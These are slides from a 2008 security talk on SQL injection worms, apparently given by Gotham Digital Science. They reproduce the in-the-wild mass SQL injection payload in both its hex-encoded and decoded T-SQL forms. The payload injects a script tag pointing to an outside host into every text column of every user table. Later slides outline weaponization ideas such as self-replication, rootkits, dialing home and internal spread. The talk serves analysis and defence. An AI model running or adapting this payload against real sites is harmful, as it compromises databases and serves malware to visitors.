SQL Injection Worms for Fun &

Profit
Justin Clarke, Andrew Carey Nairn

2008 Gotham Digital Science

Overview
The mass SQL Injection(s) earlier this year
Why it could have been worse
Demo
What its not
Any revelation of secret SQL injection fu we
dont already know about
Anything discovered in the last 7-10 years
2008 Gotham Digital Science

In the Wild
/page.asp?foo=;DECLARE%20@S%20VARCHAR(4000);SET
%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320
564152434841522832353529204445434C415245205461626C655F437572736F72204
35552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524
F4D207379736F626A6563747320612C737973636F6C756D6E7320622057484552452
0612E69643D622E696420414E4420612E78747970653D27752720414E442028622E7
8747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D3
23331204F5220622E78747970653D31363729204F50454E205461626C655F43757273
6F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E5
44F2040542C4043205748494C4528404046455443485F5354415455533D3029204245
47494E20455845432827555044415445205B272B40542B275D20534554205B272B40
432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B
272B40432B275D29292B27273C736372697074207372633D687474703A2F2F777777
2E696273652E72752F6A732E6A733E3C2F7363726970743E272727292046455443482
04E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320
454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205
461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);--

2008 Gotham Digital Science

In the Wild
DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FORSELECT
a.name,b.name FROM sysobjects a,syscolumns b
WHERE a.id=b.id ANDa.xtype='u' AND (b.xtype=99 OR
b.xtype=35 OR b.xtype=231 OR b.xtype=167)OPEN
Table_Cursor FETCH NEXT FROM Table_Cursor INTO
@T,@CWHILE(@@FETCH_STATUS=0) BEGIN
EXEC('UPDATE ['+@T+'] SET['+@C
+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))
+''<scriptsrc=http://www.ibse.ru/js.js></script>''') FETCH
NEXT FROM Table_CursorINTO @T,@C END CLOSE
Table_Cursor DEALLOCATE Table_Cursor
2008 Gotham Digital Science

Why isnt this as bad as it could be?

Profit
Aim is to install malware
But what about corporate systems?
What about installing rootkits on arbitrary
DMZd/internal systems?
What about internal sites?

2008 Gotham Digital Science

Why isnt this as bad as it could be?

Foothold
Updates database content with malicious
scripting links
What about leveraging OS access?
What about leveraging database functionality
(i.e. linked databases)?

2008 Gotham Digital Science

Why isnt this as bad as it could be?

Spread
Uses Google, through a tool, to locate targets
What about self replication?
What about intranet/extranet replication?

2008 Gotham Digital Science

Worms, weaponized
Self replicate, multiple methods (Google,
MSN, Yahoo, direct scanning of RFC 1918
addresses)
Attack both URL and forms, keep simple
state
Rootkit the underlying OS, dial home
Attack internal systems via the network

2008 Gotham Digital Science

Demo

Virtual Machine

192.168.119.5

2008 Gotham Digital Science

192.168.119.6

192.168.119.7

192.168.119.8

Demo
Limited in the following ways
SQL Server only, no Oracle, MySQL, Sybase,
DB2 etc
Doesnt use privilege escalation attacks
Limits itself to RFC 1918 IPs

2008 Gotham Digital Science

10

Recent Resources
Scrawler (HP)
http://www.communities.hp.com/securitysoftware/
blogs/spilabs/archive/2008/06/23/finding-sqlinjection-with-scrawlr.aspx

Microsoft Source Code Analyzer for SQL

Injection
http://blogs.msdn.com/sqlsecurity/archive/
2008/06/24/microsoft-source-code-analyzer-for-sqlinjection-june-2008-ctp.aspx

Microsoft URLScan 3.0 beta

2008 Gotham Digital Science

11

Contact
Justin Clarke - justin @ gdssecurity . com
Andrew Carey Nairn andrew @ gdssecurity .
com
Gotham Blog - http://ww.gdssecurity.com/l/b

2008 Gotham Digital Science

12